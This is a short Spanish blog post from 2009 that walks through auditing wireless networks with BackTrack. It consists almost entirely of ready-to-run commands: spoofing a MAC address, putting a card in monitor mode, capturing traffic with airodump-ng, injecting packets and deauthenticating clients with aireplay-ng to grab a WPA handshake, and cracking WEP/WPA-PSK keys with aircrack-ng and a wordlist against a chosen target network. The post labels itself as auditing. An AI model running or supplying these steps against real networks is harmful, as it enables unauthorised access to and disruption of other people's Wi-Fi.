Páginas

sábado, 25 de abril de 2009

BackTrack - Auditoria de Redes Wireless I

Utilizar BackTrack. Comprobar vulnerabilidades en Redes Wireless (WEP, WPA-PSK).

Conectar la tarjeta de Red y cargar el modulo de la tarjeta (dependera del Chipset de su tarjeta wireless).
lsmod para ver los modulos rmmod y modprobe para cargar y descargar modulos.

root@syslinux~# modprobe rt073usb

- comprobar interface con ifconfig

- poner en modo monitor

root@syslinux~# iwconfig rausb0 mode monitor

- desactivar interface

root@syslinux~# ifconfig rausb0 down

- cambiar MAC de la tarjeta

root@syslinux~# macchanger -m 00:55:44:33:22:11 rausb0

- levantar interface

root@syslinux~# ifconfig rausb0 up

- listar redes al alcance de mi tarjeta wireless

root@syslinux~# airodump-ng rausb0

- Elegir objetivo. Ctrl+c (para detener el scaneo de redes)

- capturar en un solo canal y guardar en archivo

root@syslinux~# airodump-ng rausb0 -w archivo -c channel

- mientras airodump captura paquetes abrimos otra Consola para inyectar paquetes y aumentar el trafico.

- si esta asociado.

root@syslinux~# aireplay-ng -1 0 -e SSID -a macobjetivo -h macstation rausb0

- autenticarse - asociarse (mi mac cambiada)

root@syslinux~# aireplay-ng -1 0 -e SSID -a macobjetivo -h 00:11:22:33:44:55 rausb0

- inyectar paquetes utilizando cliente falso

root@syslinux~# aireplay-ng -3 -b macobjetivo -h 00:11:22:33:44:55 rausb0

- inyectar paquetes utilizando station

root@syslinux~# aireplay-ng -3 -b macobjetivo -h macstation rausb0

Algunos puntos de acceso requieren reasociarse cada 20 segundos, si no el falso cliente se considera desconectado. Asociarse cada 20 segundos.

aireplay-ng -1 20 -e WLAN_13 -b macobjetivo -h maccambiada rausb0

- en este punto la captura de pqtes en airodump-ng debe aumentar

- desautenticando clientes para obligarles a reasociarse
- WPA Handshake capture.

root@syslinux~# aireplay-ng -0 5 -a macobjetivo -c macstation rausb0

- si aun no funciona

root@syslinux~# aireplay-ng -0 10 -a macobjetivo rausb0

- Buscar la clave con aircrack-ng

- aircrack-ng archivo*.cap

- Ataque de diccionario (aircrack-ng) WPA-PSK

- Descargar diccionarios http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/

- Crear diccionario

root@syslinux~# zcat all.gz | egrep -v '^#' > dic

- Utilizar diccionario

root@syslinux~# aircrack-ng -w dic -0 archivo*.cap

No hay comentarios:

Publicar un comentario